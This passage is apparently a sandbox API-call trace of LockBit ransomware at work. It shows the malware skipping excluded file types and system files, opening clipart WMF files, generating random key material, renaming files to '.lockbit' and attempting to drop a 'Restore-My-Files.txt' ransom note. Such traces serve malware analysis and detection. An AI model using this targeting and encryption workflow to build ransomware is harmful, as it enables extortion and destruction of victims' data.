Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.386] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0238959.WMF", cAlternateFileName="")) returned 1 [0153.386] lstrcmpiW (lpString1=".", lpString2="J0238959.WMF") returned -1 [0153.386] lstrcmpiW (lpString1="..", lpString2="J0238959.WMF") returned -1 [0153.386] PathFindExtensionW (pszPath="J0238959.WMF") returned=".WMF" [0153.386] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.386] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.387] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.387] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0238959.WMF") returned 1 [0153.388] lstrcmpiW (lpString1="ntldr", lpString2="J0238959.WMF") returned 1 [0153.388] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0238959.WMF") returned 1 [0153.388] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0238959.WMF") returned -1 [0153.388] lstrcmpiW (lpString1="autorun.inf", lpString2="J0238959.WMF") returned -1 [0153.388] lstrcmpiW (lpString1="thumbs.db", lpString2="J0238959.WMF") returned 1 [0153.388] lstrcmpiW (lpString1="iconcache.db", lpString2="J0238959.WMF") returned -1 [0153.388] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.388] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF") returned=".WMF" [0153.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.388] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.388] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.389] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.389] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF.lockbit") returned 72 [0153.389] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238959.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.391] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.391] malloc (_Size=0x40068) returned 0x3df0008 [0153.391] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7484) returned 1 [0153.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.392] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.392] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.397] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.397] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.398] free (_Block=0x1fa2ed8) [0153.398] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238959.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.398] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.398] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0238983.WMF", cAlternateFileName="")) returned 1 [0153.398] lstrcmpiW (lpString1=".", lpString2="J0238983.WMF") returned -1 [0153.398] lstrcmpiW (lpString1="..", lpString2="J0238983.WMF") returned -1 [0153.399] PathFindExtensionW (pszPath="J0238983.WMF") returned=".WMF" [0153.399] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.399] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.400] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.400] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0238983.WMF") returned 1 [0153.400] lstrcmpiW (lpString1="ntldr", lpString2="J0238983.WMF") returned 1 [0153.400] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0238983.WMF") returned 1 [0153.400] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0238983.WMF") returned -1 [0153.401] lstrcmpiW (lpString1="autorun.inf", lpString2="J0238983.WMF") returned -1 [0153.401] lstrcmpiW (lpString1="thumbs.db", lpString2="J0238983.WMF") returned 1 [0153.401] lstrcmpiW (lpString1="iconcache.db", lpString2="J0238983.WMF") returned -1 [0153.401] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.401] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF") returned=".WMF" [0153.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.401] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.401] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.402] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.402] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF.lockbit") returned 72 [0153.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238983.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.403] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.403] malloc (_Size=0x40068) returned 0x3df0008 [0153.403] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5048) returned 1 [0153.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.404] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.410] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.410] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.411] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.411] free (_Block=0x1fa2ed8) [0153.411] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238983.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.411] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.411] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1284, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239057.WMF", cAlternateFileName="")) returned 1 [0153.411] lstrcmpiW (lpString1=".", lpString2="J0239057.WMF") returned -1 [0153.411] lstrcmpiW (lpString1="..", lpString2="J0239057.WMF") returned -1 [0153.411] PathFindExtensionW (pszPath="J0239057.WMF") returned=".WMF" [0153.411] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.411] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.412] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.412] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239057.WMF") returned 1 [0153.413] lstrcmpiW (lpString1="ntldr", lpString2="J0239057.WMF") returned 1 [0153.413] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239057.WMF") returned 1 [0153.413] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239057.WMF") returned -1 [0153.413] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239057.WMF") returned -1 [0153.413] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239057.WMF") returned 1 [0153.413] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239057.WMF") returned -1 [0153.413] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.413] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239057.WMF") returned=".WMF" [0153.413] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.413] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.413] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.414] lstrcmpiW (lpString1=".dbv", 